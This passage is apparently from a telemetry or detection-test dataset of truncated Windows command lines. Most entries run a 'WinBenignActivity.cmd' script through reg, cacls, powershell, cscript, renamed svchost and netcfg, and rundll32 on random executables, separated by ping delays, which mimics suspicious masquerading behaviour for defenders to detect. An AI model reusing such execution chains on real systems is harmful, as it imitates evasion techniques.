c...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"ping 127.0.0.1 -n 24 \",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -21672...\",\"ping 127.0.0.1 -n 24 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 24 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -9125 ...\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"rundll32 \\\\24845\\\\2750.exe\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 24 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 24 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 24 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 24 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 24 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 24 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 24 \",\"rundll32 \\\\32641\\\\32360.exe\",\"ping 127.0.0.1 -n 24 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping 127.0.0.1 -n 24 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 24 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 24 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 11 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 20 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping 127.0.0.1 -n 11 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"C:\\\\Windows\\\\system32\\\\devicecensus.exe\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"C:\\\\Windows\\\\system32\\\\devicecensus.exe UserCxt\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\system32\\\\compattelrunner.exe\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platfor...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"taskhostw.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinB...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"ping 127.0.0.1 -n 13 \",\"reg c:\\\\diagnostics\\\\WinBenignActivity.cmd -15216 /...\",\"ping 127.0.0.1 -n 19 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 5 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd -...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -30962...\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"rundll32 \\\\28790\\\\506.exe\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 8 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 3 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 17 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 2 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 29 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping 127.0.0.1 -n 30 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 17 \",\"rundll32 \\\\5728\\\\16265.exe\",\"ping 127.0.0.1 -n 22 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd c...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"ping 127.0.0.1 -n 22 \",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -9528 ...\",\"ping 127.0.0.1 -n 22 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 22 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping 127.0.0.1 -n 22 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 22 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 22 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 22 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 22 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 22 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 22 \",\"rundll32 \\\\5914\\\\3172.exe\",\"ping 127.0.0.1 -n 22 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping 127.0.0.1 -n 22 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 22 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 22 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 25 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 32 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping 127.0.0.1 -n 2 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"taskhostw.exe\",\"C:\\\\Windows\\\\system32\\\\appidcertstorecheck.exe\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinB...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"ping 127.0.0.1 -n 16 \",\"reg c:\\\\diagnostics\\\\WinBenignActivity.cmd -981 /74...\",\"ping 127.0.0.1 -n 20 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 24 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd -...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -1796 ...\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"rundll32 \\\\25124\\\\21095.exe\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 3 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 10 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 19 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 10 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 13 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping 127.0.0.1 -n 22 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 1 \",\"rundll32 \\\\15930\\\\31294.exe\",\"ping 127.0.0.1 -n 20 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd c...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"ping 127.0.0.1 -n 20 \",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -18358...\",\"ping 127.0.0.1 -n 20 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 20 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping 127.0.0.1 -n 20 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 20 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 20 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 20 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 20 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 20 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 20 \",\"rundll32 \\\\24611\\\\27906.exe\",\"ping 127.0.0.1 -n 20 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping 127.0.0.1 -n 20 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 20 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 20 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 6 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 11 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping 127.0.0.1 -n 26 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinB...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"ping 127.0.0.1 -n 18 \",\"reg c:\\\\diagnostics\\\\WinBenignActivity.cmd -19514 /...\",\"ping 127.0.0.1 -n 21 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 11 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd -...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -11149...\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"\\\"C:\\\\Windows\\\\system32\\\\wermgr.exe\\\" \\\"-outproc\\\" \\\"0\\\" \\\"2...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"rundll32 \\\\10012\\\\26584.exe\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"\\\"C:\\\\Windows\\\\system32\\\\wermgr.exe\\\" \\\"-outproc\\\" \\\"0\\\" \\\"3...\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 30 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 17 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 21 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 18 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 30 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping 127.0.0.1 -n 14 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 17 \",\"rundll32 \\\\26132\\\\13555.exe\",\"ping 127.0.0.1 -n 18 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd c...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"ping 127.0.0.1 -n 18 \",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -26958...\",\"ping 127.0.0.1 -n 18 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 18 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping 127.0.0.1 -n 18 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 18 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 18 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 18 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 18 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 18 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 18 \",\"rundll32 \\\\21814\\\\15398.exe\",\"ping 127.0.0.1 -n 18 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping 127.0.0.1 -n 18 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 18 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 18 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 20 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 23 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping 127.0.0.1 -n 17 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"taskhostw.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\system32\\\\usoclient.exe RefreshSettings\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinB...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"ping 127.0.0.1 -n 21 \",\"reg c:\\\\diagnostics\\\\WinBenignActivity.cmd -5279 /3...\",\"ping 127.0.0.1 -n 21 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 30 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd -...\",\"ping 127.0.0.1 -n 25 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 23 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 23 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 26 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 14 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping 127.0.0.1 -n 5 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 1 \",\"rundll32 \\\\3567\\\\28584.exe\",\"ping 127.0.0.1 -n 15 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd c...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"ping 127.0.0.1 -n 15 \",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -25563...\",\"ping 127.0.0.1 -n 15 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 15 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping 127.0.0.1 -n 15 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 15 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 15 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 15 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 15 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 15 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 15 \",\"rundll32 \\\\17279\\\\3548.exe\",\"ping 127.0.0.1 -n 15 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping 127.0.0.1 -n 15 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 15 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 15 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 2 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 2 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping 127.0.0.1 -n 9 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"cmdline unknown\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\svchost.exe -k wsappx\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"cmdline unknown\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff 